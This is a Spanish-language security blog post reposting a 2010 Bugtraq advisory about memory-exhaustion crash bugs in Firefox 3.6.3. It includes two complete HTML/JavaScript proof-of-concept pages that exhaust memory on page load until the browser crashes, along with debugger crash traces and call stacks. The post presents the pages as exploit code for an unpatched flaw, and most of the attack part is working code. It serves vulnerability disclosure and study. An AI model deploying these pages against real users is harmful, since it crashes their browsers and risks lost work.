21 may. 2010

[Firefox 3.6.3] Memory Exhaustion Crash Vulnerabilities

Bueno esta vulnerabilidad lo que hace a grandes rasgos es simplemente cerrarte el Firefox.

Exploit Code:
Title: Firefox 3.6.3 (latest) <= memory exhaustion crash vulnerabilities

0x01. Description:
Memory exhaustion of Firefox 3.6.3 (latest) <= makes firefox can't make texts into body element and then it crashed. 
( raise exception using PoC #1, lower memory area read access violation using PoC #2 )
Ofcourse an variation PoC made NULL Pointer deref so may also could be code execution ( 0.1 % ). :-)

URL: http://www.x90c.org/advisories/firefox_3.6.3_crash_advisory.txt

Vendor Status: unpatched. ( to now... doesn't exists any reliable exploit so i disclosed to bugtraq firstly )

0x02. Proof of Concepts:

[PoC #1 - firefox_3.6.3_dos_poc_1.htm] --
<HTML>
<HEAD>
<SCRIPT LANGUAGE="javascript">

// Mozilla Firefox <= 3.6.3 (Win32) 0Day DoS Proof-of-Concept #1
// 
// o Summary:
// After loading this PoC, about 40 seconds later triggered.
// Crashes are occured at a same location.
//
// --
// 7c7e2af5 ff1510157d7c    call    dword ptr [kernel32!_imp__RtlRaiseException (7c7d1510)] 
//                                    ds:0023:7c7d1510={ntdll!RtlRaiseException (7c93e528)} ( raised )
//
// ##### 100% same below crash. exception raised. #####
// (f34.850): C++ EH exception - code e06d7363 (first chance)
// (f34.850): C++ EH exception - code e06d7363 (!!! second chance !!!)
// eax=0012aa58 ebx=01000121 ecx=00000000 edx=781d7ba8 esi=0012aae0 edi=2f900008
// eip=7c7e2afb esp=0012aa54 ebp=0012aaa8 iopl=0         nv up ei pl nz na pe nc
// cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
// kernel32!RaiseException+0x53:
// 7c7e2afb 5e              pop     esi    
// --
//
// Call Stack:
// 00 0012aa28 7815c54b e06d7363 00000001 00000003 kernel32!RaiseException+0x53
// WARNING: Stack unwind information not available. Following frames may be wrong.
// 01 0012aa60 78164f33 0012aa70 781caa24 781ac11c MOZCRT19!CxxThrowException+0x46
// 02 0012aa78 100cd464 08c00060 0012b1a0 21500008 MOZCRT19!operator new+0x73
// 03 00000000 00000000 00000000 00000000 00000000 xul!gfxWindowsFontGroup::MakeTextRun+0x54

// Trace:
// MOZCRT19!operator new:
//    78164ec0 8b442404        mov     eax,dword ptr [esp+4]
//    78164ec4 83ec0c          sub     esp,0Ch
//    78164ec7 50              push    eax
//    78164ec8 e8134bfdff      call    MOZCRT19!malloc (781399e0)
//     ...
//    78164f26 c74424081cc11a78 mov     dword ptr [esp+8],offset MOZCRT19!exception::`vftable'+0xc14 (781ac11c)
//    78164f2e e8d275ffff      call    MOZCRT19!CxxThrowException (7815c505)    ; Throw Exception.
//    78164f33 83c40c          add     esp,0Ch
//    78164f36 c3              ret
//
// MOZCRT19!CxxThrowException:
//    7815c505 55              push    ebp
//    7815c506 8bec            mov     ebp,esp
//    7815c508 83ec20          sub     esp,20h
//    ...
//    7815c545 ff15e4911a78    call    dword ptr [MOZCRT19!modf+0x87d4 (781a91e4)] ds:0023:781a91e4=
//                {kernel32!RaiseException (7c7e2aa9)} ; Raise Exception!
//
// o Impact: DoS ( Exception Raise )
//
// o Tested on: 
//        - MS Win XP SP3 (ko)
//        - Mozilla Firefox 3.6.3 (Win32) (ko)
//          ( Mozilla/5.0, rv:1.9.2.3, Gecko/20100401 )
//
// P.S: This vulnerability similer with the CVE-2009-1571 [1] but it's patched on Firefox 3.6 
//        so this is *not the same vulnerability*!
// 
// [1] CVE-2009-1571 ( Credit: Alin Rad Pop of Secunia ) - Thanks to Alin Rad Pop.
//     - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1571 
//
// o Discovered by x90c in INetCop(c) Security during analysis.
// o Discovered date: 2010.03.04
// o Personal homepage: http://www.x90c.org 
//
// Greets to Xpl017Elz(x82), rebel
//

function append_text_into_body()
{
    var p1 = document.getElementById('p1');
    var Text1 = "";
    var TextNode = null;

    // Trigger! MakeFont... into p element on body element.
    for(var i = 0; i < 0x700000 / 4; i++)
    {
        Text1 = Text1 + "AAAA";
    }

    TextNode = document.createTextNode(Text1);
    p1.appendChild(TextNode);    // Memory Exhaustion makes FireFox can't make Texts it caused an crash.
}

var arr1, arr2, arr3, arr4, arr5;
var a = 1;

var timer;

function fill_all_memory()
{
    var chunk = unescape("%u4141%u4141");
    var i = 0;

    if( a > 5 )
    {
        a++;
    }
    if(a >= 30)
    {
        append_text_into_body();
    }

    while(chunk.length <= 0x400000)
    {
        chunk = chunk + chunk;
    }
    chunk = chunk + chunk + chunk;
    chunk = chunk.substring(0, chunk.length);

    if(a == 1)
    {
        arr1 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr1[i] = chunk;
        }
        a = 2;
    }
    else if(a == 2)
    {
        arr2 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr2[i] = chunk;
        }
        a = 3;
    }
    else if(a == 3)
    {
        arr3 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr3[i] = chunk;
        }
        a = 4;
    }
    else if(a == 4)
    {
        arr4 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr4[i] = chunk;
        }
        a = 5;
    }
    else if(a == 5)
    {
        arr5 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr5[i] = chunk;
        }
        a = 6;
    }
}

function try_fill()
{
    fill_all_memory();
    setTimeout("try_fill();", 500);
}

</SCRIPT>
</HEAD>

<BODY onload="try_fill();">
<P id='p1'></P>
</BODY>
</HTML>

<!-- [ eoc ] -->


[PoC #2 - firefox_3.6.3_dos_poc_2.htm] --

<HTML>
<HEAD>
<SCRIPT LANGUAGE="javascript">

// Mozilla Firefox <= 3.6.3 (Win32) 0Day DoS Proof-of-Concept #2
// 
// o Summary:
// After loading this PoC, about 40 seconds later triggered.
// Crashes are occured at a same location.
//
// --
// #####  almost 99% below crash #####
// (f0c.8b4): Access violation - code c0000005 (first chance)
// First chance exceptions are reported before any exception handling.
// This exception may be expected and handled.
// eax=0012aab8 ebx=00002226 ecx=000042a4 edx=000000ee esi=00003ce8 edi=000000ee
// eip=73f937cd esp=0012a3fc ebp=0012a3fc iopl=0         nv up ei pl zr na pe nc
// cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
// USP10!DoubleWideCharMappedString::operator[]+0x1f:
// 73f937cd 0fb70448        movzx   eax,word ptr [eax+ecx*2] ds:0023:00133000=???? ( beside stack area and unmapped )
// --
//
// 0:000> kp
// ChildEBP RetAddr  
// 0012a3fc 73f99a42 USP10!DoubleWideCharMappedString::operator[]+0x1f
// 0012a4cc 73f92d34 USP10!ScriptTokenize+0x91
// 0012a4f4 100efc30 USP10!ScriptItemize+0x42
// WARNING: Stack unwind information not available. Following frames may be wrong.
// 0012a5a0 7813807d xul!gfxWindowsFontGroup::GetUnderlineOffset+0x4cb0
// 00000000 00000000 MOZCRT19!expand+0x37d
//
// o Impact: DoS ( may also code execution )
//
// o Tested on: 
//        - MS Win XP SP3 (ko)
//        - Mozilla Firefox 3.6.3 (Win32) (ko)
//          ( Mozilla/5.0, rv:1.9.2.3, Gecko/20100401 )
//
// P.S: This vulnerability similer with the CVE-2009-1571 [1] but it's patched on Firefox 3.6
//        so this is *not the same vulnerability*! and this makes same crash with [2]
// 
// [1] CVE-2009-1571 ( Credit: Alin Rad Pop of Secunia ) - Thanks to Alin Rad Pop.
//     - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1571 
//
// [2] All browsers 0day Crash Exploit ( Inj3ct0r Team )
//       - http://www.exploit-db.com/exploits/12491
// 
// o Discovered by x90c in INetCop(c) Security during analysis.
// o Discovery date: 2010.03.04
// o Personal homepage: http://www.x90c.org 
//
// Greets to Xpl017Elz(x82), rebel
//

function append_text_into_body()
{
    var p1 = document.getElementById('p1');
    var Text1 = "";
    var TextNode = null;

    // Trigger! MakeFont... into p element on body element.
    for(var i = 0; i < 0x700000 / 4; i++)
    {
        Text1 = Text1 + "AAAA";
    }

    TextNode = document.createTextNode(Text1);
    p1.appendChild(TextNode);    // Memory Exhaustion makes FireFox can't make Texts it caused an crash.
}

var a = 1;

var timer;

function fill_all_memory()    // This function's variation can makes an null pointer deref without append_text_into_body() calling.
{
    var chunk = unescape("%u4141%u4242");
    var i = 0;

    append_text_into_body();

    while(chunk.length <= 0x400000)
    {
        chunk = chunk + chunk;
    }
    chunk = chunk + chunk + chunk;
    chunk = chunk.substring(0, chunk.length);
}

function try_fill()
{
    fill_all_memory();
    // this poc makes 99% almost crashed same location as below.
    // 10: USP10!DoubleWideCharMappedString::operator[]+0x1f:
    //       73f937cd 0fb70448        movzx   eax,word ptr [eax+ecx*2] ds:0023:00133000=????
    // 100: ''
    // 150: ''
    // 200: ''
    // 300: ''
    // 500: ''
    // 1000: ''
    // 5000: ''
    setTimeout("try_fill();", 10);
}

</SCRIPT>
</HEAD>

<BODY onload="try_fill();">
<P id='p1'></P>
</BODY>

</HTML>

<!-- [ eoc ] -->


Thank you bugtraq securityfocus

[+] Salu2

Author & Editor

Ingeniero Civil en Computación (Universidad de Chile FCFM) y Diplomado en Gestión y Evaluación de Proyectos TI (Universidad de Chile FEN). Actualmente trabajo como Project Manager en varios proyectos y como asesor tecnológico para empresas.

0 Notaciones:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (25) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (1) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (130) Hack Tips (63) Hacked (6) Hacking (18) Hacking Hardware (5) HashCat (1) Herramientas (121) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (1) Leaks (21) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (193) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (145) Seguridad Web (140) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (17) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (66) Wireless Tools (13) XSS (16) Youtube (1)

 
biz.